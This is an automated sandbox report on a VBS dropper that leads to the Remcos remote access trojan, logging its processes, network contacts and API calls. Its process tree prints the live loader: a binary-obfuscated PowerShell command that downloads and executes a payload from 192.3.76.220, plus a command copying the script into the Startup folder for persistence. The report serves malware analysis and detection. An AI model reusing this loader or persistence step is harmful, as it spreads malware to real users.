Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 3, 2022, 10:06 a.m.	Aug. 3, 2022, 10:09 a.m.

Size	2.2KB
Type	ASCII text, with CRLF line terminators
MD5	`a36fdca94c76051de2864d7a73a3120b`
SHA256	`8c041884d387cbed037622d06b7364800647d367cde43b08553584f0b3d40079`
CRC32	`38CC6CF0`
ssdeep	`48:Blf5dqrnCedqVmgQKNtDz4On86EoIRbUNUv0qIe/Izm9wQho:L5YrnCed8XUO860YN00qIsIzewQho`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\edi.vbs
2776
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
  2100
  - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    2592
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'
  1660

Name	Response	Post-Analysis Lookup
geoplugin.net	A 178.237.33.50	178.237.33.50
google.com	A 172.217.174.110	172.217.25.174
eter101.dvrlists.com	A 91.192.100.38	91.192.100.38

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.174.110	Active	Moloch
178.237.33.50	Active	Moloch
192.3.76.220	Active	Moloch
91.192.100.38	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49173 -> 91.192.100.38:2050	2036594	ET JA3 Hash - Remcos 3.x TLS Connection	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49173 91.192.100.38:2050	None	None	None

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 3, 2022, 10:06 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 3, 2022, 10:06 a.m.			0	0
IsDebuggerPresent Aug. 3, 2022, 10:06 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 89 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bb08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076b6c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076c348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060bc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c4d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 3, 2022, 10:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c4d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 3, 2022, 10:06 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://192.3.76.220/client.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://192.3.76.220/favicon.ico
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://192.3.76.220/client.jpg
suspicious_features	GET method with no useragent header	suspicious_request	GET http://geoplugin.net/json.gp

Performs some HTTP requests (4 events)

request	GET http://192.3.76.220/client.txt
request	GET http://192.3.76.220/favicon.ico
request	GET http://192.3.76.220/client.jpg
request	GET http://geoplugin.net/json.gp

Allocates read-write-execute memory (usually to unpack itself) (50 out of 327 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2776 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02941000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02943000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02944000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02945000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02946000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
